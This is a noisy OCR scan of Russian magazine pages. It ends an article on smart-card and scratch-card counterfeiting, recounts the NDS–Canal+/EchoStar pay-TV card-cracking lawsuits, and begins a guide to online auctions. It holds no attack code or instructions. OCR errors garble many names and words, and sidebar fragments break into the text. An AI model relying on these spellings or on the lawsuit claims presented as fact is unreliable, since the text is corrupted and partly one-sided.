нению с магнитной картой) емкость 
носителя и удобный доступ к храня- 
щимся данным позволяют использо- 
вать одну карточку для нескольких 
типов операций. К примеру, в качест- 
ве пропуска, для получения зарплаты 
и доступа в компьютерную сеть ком- 
пании. Таким образом ты избавля- 
ешься от тугой стопки карт в кошель- 
ке, получая вместо них одну универ- 
сальную. 


Одна смарт-карта сможет заменить 
целую стопку обычных 


Что же мешает внедрению этой заме- 
чательной технологии на практике? 
Как ни банально, все опять упирается 
в деньги. И дело здесь не только и не 
столько в разнице стоимости готовых 
карт. Все дело, прежде всего, в огром- 
ной инфраструктуре, обширной сети 
банкоматов, РО$-терминалов и про- 
чей техники, охватившей всю плане- 
Ту. Замена и модификация оборудова- 
ния, разработка и внедрение програм- 
много обеспечения, обучение персо- 
нала - трудно даже представить, во 
сколько все это обойдется. 


Из-за этих сложностей смарт-карты 
пока внедряются на более узких рын- 
ках. Например, многие современные 
компьютеры, особенно предназначен- 
ные для корпоративных заказчиков, 
имеют встроенные устройства для их 


Смарт-карты используются в 
таксофонах 


чтения. Так как большинство опера- 
ционных систем поддерживают авто- 
ризацию пользователей с помощью 
аппаратных средств, это позволяет 
существенно повысить безопасность 
в компьютерной сети компании. Те- 
перь нерадивые пользователи не бу- 
дут приклеивать бумажку с паролем 
на монитор или класть ее под клавиа- 
туру :). Будет достаточно вставить 
свою персональную (без пошлостей) 
карту в слот и готово. 


В новостях регулярно появляются со- 
общения о том, что правительства раз- 
ных стран планируют использовать 
возможности смарт-карт для создания 
паспортов нового поколения, разме- 
щая в памяти целую картотеку данных 
по каждому гражданину: биометричес- 
кую информацию, медицинскую и стра- 
ховую истории, ключи персональной 
"электронной подписи" и т.п. 


СКРЕТЧ-КАРТЫ 

m Мошенничество с предоплачен- 
ными, или скретч-картами, наиболее 
распространено. Действительно, не- 
серьезно было бы тратить время и 
деньги на разработку каких-то хитрых 
технологий для считывания информа- 
ции под защитным слоем. К тому же 
прибыли здесь несравнимо меньше и 
ограничены. Гораздо интереснее за- 
купить оборудование и организовать 
производство большой партии "двой- 
ников", максимально похожих на кар- 
ты популярных платежных систем, те- 
лекоммуникационных компаний и т.п. 


Из-за специфики скретч-карт, их гра- 
фическому одрормлению уделяется 
особое внимание. Обычно отличия 
"двойников" от оригинала проявляют- 
ся именно в деталях, когда не удается 
повторить более сложный технологи- 
ческий процесс или миниатюрные 
элементы рисунка. Так, в известном 
инциденте с распространением Nog- 
дельных карт "БИ+" опознать их мож- 
но было по более широким линиям 


штрих-кода и способу его нанесения 
(не над защитным слоем ламината, а 
под ним). Еще одним различием (бо- 
лее заметным) был повторяющийся 
серийный номер. 


В простейшем случае номера генери- 
руются случайно. Если же преступни- 
кам каким-либо образом удастся запо- 
лучить базы данных действительных 
номеров и РИ\-кодов, а потом выбро- 
сить на рынок подобные подделки... 
Примерно такие кошмары снятся руко- 
водителям служб безопасности круп- 
ных интернет-провайдеров и компа- 
ний-операторов сотовой связи :). 


Именно поэтому многие крупные сфир- 
мы предпочитают взять выпуск "плас- 
тика" в свои руки. Для этого они заку- 
пают оборудование на сотни тысяч 
долларов, обучают персонал и нала- 
живают собственное производство. 
Впрочем, зачастую бывает достаточ- 
но закупать готовые карты у специа- 
лизированных компаний, а потом на 
собственных мощностях наносить на 
них номера и защитный слой. 


ЧТО ДАЛЬШЕ 

ш Гри описанные категории не охва- 
тывают все разнообразие карт. Для 
пропусков и страховых полисов, к 
примеру, часто используются лишь 
штрих-коды, а в дисконтных и клуб- 
ных системах карты могут вообще не 
нести никакой информации, кроме 
уникального номера и ФИО. В боль- 
шинстве случаев повысить относи- 
тельно невысокий уровень защиты 
позволяет нанесение фотографии 
владельца (и на проходной, и в мага- 
зине достоверность дополнительно 
проверяется человеком). А защитить 
карту от подделки помогает сложная 
полиграфия, например, нанесение го- 
лографического рисунка. 


В общем, технологий очень много, а 
завтра будет еще больше. Хорошо пи 
это? Да просто замечательно! Но вер- 
но сказал классик: воруют... 


Следи за окружающими при 
использовании банкомата 


Для пропус- 
ков и стра- 
ховых поли- 
сов, к при- 
меру, часто 
использу- 
ются лишь 
штрих-ко- 
ды, а в дис- 
контных и 
клубных 
системах 
карты мо- 
гут вообще 
не нести 
никакой ин- 
формации, 
кроме уни- 
кального 
номера и 
Ф.И.О. 
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ji етом этого года транснациональная компания NDS Group, один из главных разработчиков смарт-карт доступа для 
систем платного ТВ, выпустила интересный пресс-релиз. Заголовок документа говорит сам за себя: "NDS 
отвергает судебный иск компании EchoStar как безосновательный и оппортунистический". 


СЛУХИ 


m Суть же обвинений 


Суть же об- 
винений ме- 


диакомпа- 
нии 
EchoStar 
сводится к 
тому, что 
NDS тайно 
занимается 
промыш- 
ленным 
шпионажем 
и взломом 
смарт-карт 
конкурен- 
тов, а добы- 
тую инфор- 
мацию 
"сливает" 
через ин- 
тернет в се- 
ти пиратс- 
кого под- 
полья. 


Факты та- 
ковы, что 
наряду с 
продажами 
легального 
рынка, на 
черном и 
сером рын- 
ках крутят- 
ся миллио- 
ны таких 
же (по сути, 
идентичных 
фирмен- 
ным) смарт- 
карт "тем- 
Horo" про- 
исхождения. 


медиакомпании 
EchoStar (владеющей в США второй 
по величине, после DirecTV, спутнико- 
вой ТВ-сетью Dish Network) и 
родственной ей американо-швейцарс- 
кой фирмы NagraStar сводится к тому, 
что NDS тайно занимается промыш- 
ленным шпионажем и взломом смарт- 
карт конкурентов, а добытую столь 
нечестным путем информацию "сли- 
вает" затем через интернет в сети пи- 
ратского подполья. 


Через пресс-релиз NDS глава компа- 
нии Абе Пелед дал весьма решитель- 
ный отпор всем этим обвинениям, зая- 
вив, что его фирма "не имеет ничего 
общего с пиратским взломом EchoStar 
или каких-либо других смарт-карт; 
NDS - ведущий в мире поставщик сис- 
тем защиты платного телевидения, 
давно и прочно приверженный иско- 
ренению пиратства в индустрии, а иск 
EchoStar/NagraStar - это, по сути дела, 
повторение другого безосновательно- 
го судебного дела, затеянного против 
нас около года назад и с тех пор прек- 
ращенного". И добавляется - "если бы 
за данными обвинениями реально 
что-то стояло, все выяснилось бы 
давным-давно, а так - это просто не- 
серьезные попытки судебными тяжба- 
ми нанести вред NDS и помешать 
честной конкуренции..." 


Все эти громкие, но довольно неиск- 
ренние (как будет показано далее) 
слова скрывают за собой весьма инт- 
ригующую историю, которую имеет 
смысл разобрать в подробностях, так 
как на протяжении всего последнего 
десятилетия сфера платного телеви- 
дения демонстрирует весьма парадок- 
сальную картину. 


Как известно, в качестве наиболее 
удобного "ключа" для гибкого управ- 
ления просмотром защищенных теле- 
каналов выбрана технология смарт- 
карт, и по самым грубым подсчетам, 
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сейчас сети платного телевидения по 
всему миру защищают от 80 go 100 
миллионов таких чип-карт разных сис- 
тем. При этом, несмотря на участие в 
столь прибыльном бизнесе несколь- 
ких многомиллиароных корпораций, 
вкладывающих массу сил и средств в 
защиту своих карточек доступа, бук- 
вально все они быстро и эсрфективно 
вскрываются пиратами, наводняющи- 
ми рынок контрадффактной продукцией. 
И что показательно, осуществляется 
взлом столь профессионально и стре- 
мительно, что порой пиратские карты 
новых моделей появляются на чер- 
ном рынке даже раньше, чем у офи- 
циальных продавцов-реселлеров на 
местах. Другими словами, иногда это 
может происходить чуть ли не синх- 
ронно с публикацией гордого пресс- 
релиза компании спутникового теле- 
видения о разработке и выпуске но- 
вой сверхнадежной технологии защи- 
ты от нелегального доступа. 


Выдвинуто несколько предположений 
и о других, более тонких механизмах, 
обеспечивающих нелегальное обога- 
щение на пиратстве для определен- 
ных прослоек в руководстве ТВ-ком- 
паний. Однако это были лишь слухи, а 
самых разнообразных и нелепых go- 
мыслов, как известно, гуляет по Сети 
более чем достаточно. Конкретных же 
свидетельств долгое время ни у кого 
не было, но весной прошлого года 
разразился скандал... 


ЗАГАДОЧНЫЕ ПИРАТЫ 


ГРАНД-СКАНДАЛ 

m 12 марта 2002 года европейская 
группа компаний Canal Plus объявила 
о возбуждении открытого судебного 
разбирательства против фирмы №05 
Group, обвинив конкурентов в том, 
что они "затратили большие деньги и 
ресурсы" на взлом системы смарт- 
карт MediaGuard для защиты платного 
TB Canal+. А взломав, опубликовали 
критично важную информацию в ин- 
тернете, чем способствовали навод- 
нению рынка пиратскими картами и 
гигантскому росту нелегального бесп- 
латного пользования системой. В ис- 
ковом заявлении, сопровождающем 
обвинение, Canal Plus оценила поне- 
сенные в результате этого убытки в 
скромную сумму 1,2 миллиарда зеле- 
ных фантиков. 


Чтобы тебе стал более понятен гран- 
диозный, воистину глобальный харак- 
тер этого скандала, поясню, что Сапа! 
Plus является телевизионным подраз- 
делением франко-американского ме- 
диагиганта Vivendi Universal, а компа- 
ния NDS, в свою очередь, на 80% 
принадлежит Sky Global Networks, 
подразделению спутникового телеви- 
дения медиаимперии News 
СогрогаНоп австралийца Руперта 
Мердока. News Corporation - это сотни 
газет и журналов на всех пяти конти- 
нентах, книжное издательство 
HarperCollins, в киноиндустрии - ком- 
пания ХХ Century Fox, в сетях TB-Be- 


Ш Факты таковы, что наряду с продажами легального рынка, на 
черном и сером рынках крутятся миллионы таких же (по сути, иден- 
тичных фирменным) смарт-карт "темного" происхождения. По этой 
причине в интернет-сообществе уже много лет ходят слухи, будто 


столь грандиозный расцвет пиратства тайно подпитывают сами же 
корпорации, ведущие между собой острую конкурентную борьбу. 
Ведь вскрытие секретного кода конкурента с последующей его ши- 
рокой публикацией делают ТВ-каналы соперника практически 
бесплатными. А значит, конкуренту неминуемо грозят крупные 
убытки, а, может, и вообще разорение. 


СУДЕБНЫЙ ИСК ПРОТИВ NDS GROUP 


Ш В судебном иске французов заявлено, что о широком распрост- 
ранении контрафактных карт доступа к ТВ-сетям Сапа!+ стало из- 
вестно в конце 1999 года, после того, как код, компрометирующий 
MediaGuard, был опубликован на веб-сайте канадских хакеров 


Digital Reference (www.dr7.com). 


Ш После публикации этого кода специалисты Canal+, имеющие свя- 
зи в хакерских кругах, провели собственное расследование с целью 
установления, каким образом была похищена информация, и кто 
именно это сделал. Результаты же расследования оказались шоки- 
рующими. Выяснилось, что за всей этой историей стоит компания 
NDS, вскрывшая смарт-карту MediaGuard в своем исследовательс- 
ком подразделении в Израиле, а затем переправившая критичный 
фрагмент кода в Америку для распространения через интернет. 


щания - компании BSkyB (в Великоб- 
ритании), Fox Cable, Fox Broadcasting и 
уже почти купленная DirecTV (в США), 
Star TV (в Китае) и Sky Latin America 
(в южноамериканском регионе). 


В этой империи NDS Group 
(www.ndsworld.com) занимается раз- 
работкой и продвижением собствен- 
ной смарт-картной технологии 
VideoGuard, управляющей доступом к 
каналам платного телевидения, а кли- 
ентами этой технологии являются, в 
том числе, и многие другие крупные 
фирмы, такие, Kak DirecTV или 
Discovery Communications. В общей 
сложности легальными картами 
VideoGuard пользуются сейчас в мире 
свыше 30 миллионов подписчиков. 


В медиаимперии Vivendi Universal раз- 
работкой собственных смарт-карт ус- 
ловного доступа MediaGuard занима- 
лась французская компания Сапа! 
Plus Technologies (www.canalplus-tech- 
nologies.com), технологическое под- 
разделение Canal+. Карты MediaGuard 
также весьма широко распростране- 
ны в мире и по общему числу подпис- 
чиков - более 10 миллионов - занима- 
ют сейчас третье место. 


Судебный иск, обвиняющий №05 в 
тайных действиях, направленных на 
подрыв конкурентоспособности 
Canal+ на рынке цифрового телевиде- 
ния, был подан в американский ок- 
ружной суд штата Калифорния, пос- 
кольку там (в Сан-Франциско) нахо- 
дится региональная штаб-квартира 
Vivendi Universal, а по соседству (в 
Южной Калифорнии) и американское 
представительство NDS. 


ЭТО ДЕЛАЮТ ВСЕ 

m Первое, что заявила в свою защи- 
ту NDS, - это намерение подать 
встречный иск против Canal+, пос- 
кольку Canal Plus Technologies также 
занимается работами по вскрытию 3a- 
щиты чужих смарт-карт и переманива- 
нием к себе для этого программистов- 
хакеров из других фирм. А затеянный 


судебный иск - это, мол, просто месть 
более удачливому конкуренту после 
неудавшихся переговоров о слиянии 
в декабре 2001 года. 


Как прокомментировал ситуацию Ай- 
ра Уинклер, главный стратег по безо- 
пасности фирмы Hewlett-Packard (в 
прошлом аналитик Агентства нацио- 
нальной безопасности США), полный 
демонтаж всякой новой продукции 
конкурентов входит ныне в стандарт- 
ную корпоративную практику. Напри- 
мер, по словам Уинклера, "как только 
новая машина появляется на рынке, 
всякий автопроизводитель в мире 
знает, что первыми покупателями 
непременно будут соперники, которые 
по-тихому разберут ее до последнего 
болта, чтобы посмотреть, как там все 
работает". И тому имеется более чем 
достаточно подтверждений. 


Ясно, что громкий прецедент с крими- 
нализацией обратной инженерной 
разработки ставит в крайне неловкое 
положение очень многие солидные 
фирмы. Однако, соглашается Уинклер, 
повсеместная корпоративная практика 
еще не дошла до того, чтобы выкла- 
дывать на веб-сайтах сфирменные сек- 
реты конкурентов или инструкции по 
их компрометации. И вряд пи какая-то 


из компаний захочет этим прославить- 
ся, поскольку удар по репутации будет 
нанесен самый серьезный. 


ИГРА БЕЗ ПРАВИЛ 

m Невзирая на явные и скрытые уг- 
розы NDS в ответ предать огласке 
имеющийся компромат на истца, ком- 
пания Canal Plus все же решилась 
пойти на открытое выяснение отноше- 
ний, чувствуя собственную правоту и 
располагая значительным количест- 
вом убедительных улик против конку- 
рента. В последующие месяцы часть 
этих документов была запущена в 
прессу и интернет, продемонстриро- 
вав публике, насколько тесно переп- 
летены совместные дела большого 
ТВ-бизнеса и хакерского андеграунда. 


Вообще-то, не секрет, что самые изве- 
стные хакеры, в основном немцы, ус- 
пешно вскрывавшие в подполье чип- 
карты ТВ-доступа в начале 1990-х го- 
дов, и сегодня занимаются тем же са- 
мым, но уже вполне оффициально. 
Всегда старающийся держаться по- 
дальше от бизнеса Маркус Кун сде- 
лал заметную научную карьеру, блес- 
тяще защитив в Кембридже докторс- 
кую диссертацию по способам взлома 
и методам защиты смарт-карт. Прия- 
тель Куна, Оливер Кеммерлинг, пе- 
ребрался в Англию и возглавил не- 
большую лондонскую фирму ADSR, 
которая занимается тестовым вскры- 
тием, разработкой способов защиты и 
техническим консультированием 
фирм, использующих смарт-карты. 


Примерно в том же направлении на- 
мечалась и судьба знаменитого хаке- 
ра Бориса Флоричича, более извест- 
ного в интернете под псевдонимом 
"Tron". Осенью 1998 года он получил 
конфиденциальное, но вполне одфи- 
циальное приглашение на работу в 
NDS, однако две недели спустя был 
найден повешенным в одном из пар- 
ков Берлина. Еще один давний знако- 
мый Куна, Кеммерлинга и Флоричича, 
американец Крис Тарновски, более 
известный под сетевыми никами "Big 
Gun" и "Von", в начале 1990-х зани- 
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И что пока- 
зательно, 
осущес- 
твляется 
взлом столь 
профессио- 
нально и 
стремитель- 
но, что по- 
рой пиратс- 
кие карты 
новых мо- 
делей появ- 
ляются на 
черном 
рынке даже 
раньше, чем 
у офици- 
альных про- 
давцов-ре- 
селлеров на 
местах. 


Наконец, 
почему ана- 
лиз разбро- 
са серийных 
номеров 
смарт-карт 
показывает, 
что их вы- 
пускается 
чуть ли не 
в три раза 
больше, чем 
количество 
официаль- 
ных абонен- 
тов платно- 
го ТВ? 


Вообще-то, 
не секрет, 
что самые 
известные 
хакеры, в 
основном 
немцы, ус- 
пешно 
вскрывав- 
шие в поб- 
полье чип- 
карты ТВ- 
доступа в 
начале 
1990-х го- 
дов, и се- 
годня зани- 
маются тем 
же самым, 
но уже 
вполне офи- 
циально. 


Bnocneg- 
ствии от 


своих подо- 
печных в 
Хайфе Кем- 
мерлинг уз- 
нал, что 
№5 заку- 
пила пар- 
тию смарт- 
карт Сапа!+, 
которые че- 
рез некото- 
рое время 
были в Из- 
раиле ус- 
пешно взло- 
маны. 


ТЕОРИЯ 


ИГРЫ ИНДУСТРИАЛЬНОГО РАЗМАЖА _ 


мался в Германии спутниковой 
связью на одной из военных баз 
США, а затем вернулся в Америку. 
Сейчас уже многим известно, что с 
1997 года Тарновски стал штатным, 
хотя и тайным, сотрудником NDS, ра- 
ботая там под именем Майк Джордж и 
по-прежнему сохраняя тесные контак- 
ты с компьютерным андеграундом. 


ВСЕ ТАЙНОЕ 
СТАНОВИТСЯ ЯВНЫМ 
Значительно меньше известно о 
том, что эти люди (Кеммерлинг и Тар- 
новски), являясь наиболее авторитет- 
ными специалистами в своей области, 
работали одновременно по заказам 
сразу нескольких конкурирующих 
сторон, а потому попали в крайне зат- 
руднительное положение, когда тай- 
ные махинации их работодателей ста- 
ли достоянием гласности. 


Стараясь оставаться честным, Оливер 
Кеммерлинг в официальных показа- 
ниях подтвердил, что он и его сфирма 
помогали NDS оборудовать в Хайфе 
(Израиль) специальную лабораторию 
по вскрытию смарт-карт, одновремен- 
но обучая сотрудников эффективным 


методам взлома, разработанным им 
совместно с Маркусом Куном. 


Впоследствии от своих подопечных в 
Хайфе Кеммерлинг узнал, что NDS 
закупила партию смарт-карт Сапа!+, 
которые через некоторое время бы- 
ли в Израиле успешно взломаны. К 
Кеммерлингу попал на ознакомление 
соответствующий внутренний доку- 
мент NDS с извлеченным из карты 
MediaGuard кодом и описанием мето- 
дики преодоления защиты. Когда в 
конце 1999 года аналогичные мате- 
риалы всплыли в интернете, на кана- 
дском хакерском сайте Г 
Кеммерлинг без труда узнал в них 
файлы лаборатории в Хайсре. Чуть 
позже это же подтвердил ему и зна- 
комый из NDS, сообщивший, что из 
Израиля эти материалы были переп- 
равлены в Южную Калифорнию Кри- 
су Тарновски, на которого возлага- 
лась задача по собственным каналам 
запустить материал в интернет. 


Как показали последующие события, 
избранный "канал" оказался не слиш- 
ком удачен - в 2000 году американская 
таможня задержала предназначавшу- 
юся Тарновски оплату в размере 40 
тысяч долларов, поскольку деньги сле- 
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Явно назревала шумная разборка, 
сулившая пролить свет на скрытный 
и темный сектор индустрии развлечений 


MB TECHNOLOGIES 


довали из Канады в пачках банкнот, 
упрятанных в корпусах радиоэлектрон- 
ного оборудования. Собственно гово- 
ря, тогда-то и стало известно, что зна- 
менитый в андеграунде Big Gun являет- 
ся тайным сотрудником NDS, поскольку 
именно ушлые адвокаты компании "от- 
мазали" в тот раз Тарновски от караю- 
щей руки правосудия. 


В итоге же в высшей степени двус- 
мысленном положении оказался Оли- 
вер Кеммерлинг, поскольку его фир- 
ма работала по заказам не только 
NDS, но и Canal+, и других фирм плат- 
ного телевидения. Кроме того, компа- 
ния ADSR принадлежит Кеммерлингу 
лишь на 60%, в то время как осталь- 
ной долей владеет NDS, He желающая 
ее продавать основному хозяину. 


В достаточно похожей ситуации ока- 
зался и Крис Тарновски, который, как 
выяснилось в ходе суда, также имел с 
Сапа!+ соглашение на исследование 
защиты смарт-карт нового поколения 
MediaGuard2, одновременно являясь 
сотрудником NDS. Судя по заявлени- 
ям адвокатов Canal+, Тарновски тоже, 
вроде бы, согласился дать честные 
показания о своем участии в интер- 
нет-публикации кода в 1999 году, хотя 
и не скрывал, что боится. 


ЕЩЕ ПОВОЮЕМ 

Явно назревала шумная разборка, 
сулившая пролить свет на скрытный и 
темный сектор индустрии развлече- 
ний. Сектор, где руководители и сот- 
рудники известнейших компаний тес- 
нейшим образом переплетены с неле- 
гальным компьютерным андеграун- 


дом, а программисты корпораций и 
крякеры пиратского бизнеса оказыва- 
ются одними и теми же лицами. Этот 
суд обещал раскрыть очень многие 
неясные вопросы, будоражившие ин- 
тернет-сообщество. 


Например, кто стоял за вскрытием 
смарт-карт ТВ-сети Dish Network компа- 
нии EchoStar, второго важнейшего иг- 
рока на рынке спутникового телевиде- 
ния в США? Ведь по добытым Сапа!+ 
сведениям, Крис Тарновски одновре- 
менно с кодом к MediaGuard получил и 
код к смарт-карте 


ae 


Ведь, к примеру, компания DirecTV, MHO- 
го лет применяющая разновидность 
VideoGuard, уже до того отчаялась бо- 
роться с пиратами, что пошла на раз- 
рыв контракта с NDS, решив заняться 
разработкой смарт-карт собственными 
силами. Наконец, почему анализ разб- 
роса серийных номеров смарт-карт по- 
казывает, что их выпускается чуть ли 
не в три раза больше, чем количество 
осрициальных абонентов платного ТВ? 
И куда уходят все эти десятки миллио- 
нов "резервных" смарт-карт? 


Увы, никаких ответов на эти вопросы 
пока получить не удалось. Уже к началу 
июня 2002 года, когда в империи Рупер- 


та Мердока убедились, что угрозами и 
через адвокатов замять скандальное 
дело не удается, в ход был пущен реша- 
ющий аргумент - большие деньги. Учи- 
тывая сильные финансовые трудности 
конкурента, корпорация News объяви- 
ла, что за миллиард евро покупает у 
Vivendi Universal итальянскую компа- 
нию платного телевидения Telepiu. Эта 
сеть принадлежала Canal+ и чуть ли не 
больше всех пострадала от пиратов - по 
некоторым подсчетам, среди общего 
числа зрителей платного спутникового 
телевидения в Италии пиратскими кар- 
тами в 2001 году пользовались почти 
три четверти. Одним же из главных ус- 
ловий сделки стало то, что Vivendi обя- 
залась прекратить судебное разбира- 
тельство в Калифорнии. 


С фирмой Canal Plus Technologies в но- 
вых условиях обошлись примерно так 
же, как с Telepiu - дирекция Vivendi ee 
тоже выставила на продажу. В сентяб- 
ре 2002 года это подразделение купи- 
ла французская фирма радиоэлектро- 
ники Thomson, но направление смарт- 
карт условного доступа пришлось 
здесь не ко двору. Тут же в качестве 
потенциального покупателя всплыла 
фирма NDS, и, произойди эта сделка, 
столь шумный недавно скандал ока- 
зался бы окончательно забытым. 


Но в конечном итоге, в августе 2003 
года, технологию MediaGuard (и всю 
сопутствующую ей интеллектуаль- 
ную собственность) выкупила у 
Thomson швейцарская фирма 
Kudelski (www.nagra.com). Причем 
Kudelski - это разработчик тех самых 
карт Nagra, что закрывают среди про- 
чего и платные ТВ-каналы EchoStar. A 
именно EchoStar и ее совместное с 
Kudelski предприятие NagraStar воз- 
родили угробленный было судебный 
процесс против NDS и жаждут ныне 
справедливости. Так что поиски прав- 
ды ещене закончены :). 


Выясни- 


лось, что за 
этим стоит 
компания 
NDS, 
вскрывшая 
смарт-карту 
MediaGuard 
в своем ис- 
следова- 
тельском 
подразделе- 
нии в Изра- 
иле, а затем 
переправив- 
шая кри- 
THYHbIN 
фрагмент 
кода для 
распростра- 
нения через 
интернет. 


В той или 
иной форме 
обратной 
инженерной 
разработ- 
кой, то есть 
негласным 
вскрытием 
программ и 
оборудова- 
ния конку- 
рентов, за- 
нимаются 
практически 
все серьез- 
ные игроки 
на рынке. 


Nagra, закрывающей 
каналы EchoStar. Если 
и это сделали в Хайсре, 
то кто же тогда посто- 
янно вскрывает смарт- 
карты самой NDS? 
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ИНТЕРНЕТ-АУКЦИОН - НА ЧЕМ ДЕЛАЮТ ДЕНЬГИ 


$85255 


мысл аукциона сводится 


к тому, что продавец хо- 


чет получить максимум 


денег за свой товар, а 


Обычные 


аукционы у 
нас не осо- 
бо распро- 
странены, 
зато online- 
аукционы 
приобрета- 
ют все 
большую 
популяр- 
ность. 


На интер- 
нет-аукцио- 
нах можно 
продать и 
купить 
практически 
все - от 
мелких без- 
делушек, за- 
жигалок или 
карточек оп- 
латы теле- 
фона и ин- 
тернета до 
роскошных 
домов на 
Средиземном 
море. 


покупатель - заплатить 
за него минимальную цену. При этом они 
торгуются между собой по установлен- 
ным заранее правилам. Важной особен- 
ностью аукционов является то, что вла- 
делец аукциона не участвует в торговле 
- площадка аукциона это только Nocpeg- 
ник между продавцом и покупателем. 


Обычные аукционы у нас не особо расп- 
ространены, зато опйпе-аукционы приоб- 
ретают все большую популярность. На 
них можно продать и купить практически 
все - OT мелких безделушек, зажигалок 
или карточек оплаты телефона и интер- 
нета до роскошных домов на Средизем- 
ном море и произведений искусства. 


Необходимо также отметить, что, в от- 
личие от обычных, оппе-аукционы 
проводятся в течение достаточно дол- 
гого промежутка времени, как прави- 
no, oT 2 go 15 дней. Это позволяет го- 
раздо большему количеству людей 
принять в них участие. 


ВИДЫ АУКЦИОНОВ 

m Kak ни странно, есть несколько 
видов аукционов. Вроде бы чего уж 
проще - показал товар, цену назначи- 
ли, продал. Ан нет! 


ПРЯМОЙ (АНГЛИЙСКИЙ) 
АУКЦИОН 

и о самый простой и распространен- 
ный вид аукциона. Он проводится с 
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гласными торгами и поднятием цены. 
На нем можно продать или купить 
практически любые веши и услуги, 
которые не запрещены законодатель- 
ством. Каждый участник, торгуясь за 
выставленный NOT, поднимает цену. 
Выигрывает лот тот участник, который 
назовет максимальную цену. Торги 
ведутся от одного дня до двух не- 
дель и прекращаются по окончании 
этого срока. Выигравшим считается 
участник, назвавший максимальную 
цену за товар. Однако товар может 
быть и не продан. Это происходит в 
случае, если им никто не заинтересо- 
вался, или цена, данная за него по- 
купателем, была ниже резервной - 
минимальной цены, за которую про- 
давец согласен продать свой товар. 
Тем не менее, на таких аукционах 
азартные покупатели иногда подни- 
мают цены очень высоко. 
Большинство оп!пе-аукционов рабо- 
тают именно по этой схеме: это и са- 
мый известный в мире ebay 
(www.ebay.com), и наши www.molotok.ru, 
www.oho.ru, www.kupi-prodai.com и другие. 


` Самый крупный интернет-аукцион eBay | 


ОБРАТНЫЙ АУКЦИОН 

m Обратный аукцион является пол- 
ной противоположностью английс- 
кому аукциону. Здесь покупатели 
объявляют о том, что хотели бы при- 
обрести. В ответ продавцы выстав- 
ляют свои предложения. При этом 
продавцы конкурируют между со- 
бой, и цены уменьшаются. К сожале- 
нию, российских интернет-аукцио- 
нов, реально работающих по такой 
схеме, я не нашел, а среди междуна- 
родных известны WWW.priceline.com и 
www.ewanted.com. 


ГОЛЛАНДСКИЙ АУКЦИОН 

ш Этот вид аукционов отличается 
тем, что продавец может выставить 
несколько единиц товара. Покупатели 
так же, как и в английском аукционе, 
поднимают цену, но все выигравшие 
будут платить минимальную из выиг- 
равших цен. Например, продавалось 
десять единиц товара, максимальная 
цена Ha него была $100, десятая - 
$80. В этом случае все десять покупа- 
телей купят данный товар за $80. 
Еще одной особенностью этого вида 
аукционов является то, что на нем 
нельзя выставлять резервную цену. 


АУКЦИОН ЯНКИ, . 
ДИСКРИМИНАЦИОННЫЙ 

m Главной особенностью такого 
вида аукционов являются закры- 
тые торги. В этом случае победи- 
тель покупает товар за ту цену, ко- 
торую он назвал. Обычно каждый 
участник подает только одну заяв- 
ку. После открытия заявок опреде- 
ляется победитель. Если присут- 
ствуют несколько единиц товара, то 
все поданные заявки сортируются 
по убыванию предложенной цены, 
а выигравшие платят именно ту 
сумму, которую предложили в ходе 
торгов. 


Есть еще и другие виды аукционов, но 
они не представлены в интернете. Ес- 
ли тебя они заинтересовали, смотри 
www.kirills.com/service/online_auction.html. 


Scie a 


После регистрации на указанный 
ящик вышлют письмо с подтвержде- 
нием. Активировав его, ты станешь 
полноправным участником опИпе- 
торгов. 


КАК ПРОДАВАТЬ ТОВАР 
НА АУКЦИОНЕ 

О том, как регистрироваться, выс- 
тавлять товар и вести торги я тебе пе- 
ресказывать не буду. Эту информа- 
цию ты найдешь в подсказке любого 
интернет-аукциона. Там она представ- 
лена подробно и понятно. Например, 
для Молотка читай ее по адресу 

‚ а для еВау смотри 


ТЕХНОЛОГИЯ РАБОТЫ 

Владельцы интернет-аукционов, 
как я уже говорил, сами ничего не 
продают и не покупают, а являются 
лишь посредниками между продавна- 
ми и покупателями. При этом, как пра- 
вило, все затраты оплачивает Npoga- 
вец, перечисляя на счет аукциона 
процент от окончательной цены про- 
данного товара. 


Для того чтобы стать продавцом или 
покупателем аукциона, необходимо 
зарегистрироваться. Приготовься к 
тому, что тебе придется выложить 90- 
вольно много информации о себе. 
Хотя, если ты решил всерьез и на- 
долго заняться покупкой-продажей 
товара через инет, это будет тебе 
только на руку. Тебя проверят и ста- 
нут доверять, причем с каждой чест- 
ной сделкой доверие будет расти как 
на дрожжах :). 


220 программ на CD, прила- 
гаемом к каждому журналу. 


(game)/and 


Как только 
твое имя 
появится на 


интернет- 
аукционе, 
твой элект- 
ронный 
ящик не- 
медленно 
завалят 
спамом. 


Американ- 
цам нравит- 
ся советс- 
кая симво- 
лика, и они 
готовы за 
это пла- 
тить. 


СТО РУБЛЕЙ РАЗ.. СТО РУБЛЕЙ OBA... СТО РУБЛЕЙТ1 РИ! \ 


Ш Американский школьник Карл Гаджа с помощью интернет- 
аукционов зарабатывает себе на мороженое, пиво и другие сла- 
дости. Он заказывает через интернет всевозможную халяву, 
благо в странах загнивающего капитализма этого добра пре- 
достаточно, а затем продает ее с аукциона. Хорошо, по его сло- 
вам, идут бесплатные билеты на концерты, музыкальные CD, об- 
разцы новых товаров. Самым большим достижением стала про- 
gama целой партии планшетных сканеров Visioneer. Их удалось 
загнать аж по 35 баксов за штуку. 


на http://pages.ebay.com/doitebay/ или на 
русском - www.vxzone.com/register.htm. 


Допустим, ты решил наконец-то про- 
дать старые бабушкины часы с ку- 
кушкой или, может быть, купить комп 
за 100 баксов. Как и в любом деле, на 
интернет-аукционах существуют свои 
тонкости, не зная которых, можно по- 
пасть впросак. 


Дело в том, что на американских аук- 
ционах ряд товаров продается только 
для американцев. Правда, если тебе 
ну очень нужна вон та штуковина, мо- 
жешь связаться с посредниками, ко- 
торые за определенный процент вы- 
купят нужный тебе товар и даже пе- 
решлют его тебе. 


Интересной услугой является также 
"покупка через посредника". Напри- 
мер, если тебе уже надоело спорить с 
оппонентом (покупателем или продав- 
цом) насчет того, каким образом пере- 
числить деньги и как доставить товар, 
предоставь посреднику уладить эти 
проблемы. Он решит за тебя все воп- 
росы по оплате, доставке товара в 
любую страну, уладит таможенные 
вопросы. 

Главное, выбери реального посредни- 
ка, о котором кто-нибудь из знакомых 
уже что-нибудь знает. Иначе есть 
шанс остаться у разбитого корыта - 


ни рыбки тебе золотой, ни зелени заг- 
раничной. 

На сайте www.westernbid.com ты най- 
дешь рекламу посредников, но выбор 


ee Зы: жеж РО РЕНИ er ee отек 
вы 


и не. 


‚Реальный лот | 


Ш На интернет-аукционах порой случаются и забавные истории. 
Так, некоторое время назад, на интернет-аукционе Www.stavka.ru 
проводилась акция "Ставка дня". На ней выставлялись на аукци- 
